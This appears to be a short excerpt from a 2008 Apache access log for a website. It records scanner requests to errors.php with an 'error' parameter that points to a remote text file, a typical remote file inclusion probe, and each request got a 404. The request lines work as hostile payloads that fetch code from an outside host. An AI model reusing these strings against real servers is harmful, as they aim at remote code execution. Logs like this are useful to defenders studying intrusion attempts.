98.136.50.138 - - [26/Oct/2008:10:53:35 -0700] "GET /errors.php?error=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:53:35 -0700] "GET /logs/access_080529.log/errors.php?error=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:10:53:35 -0700] "GET /logs/erro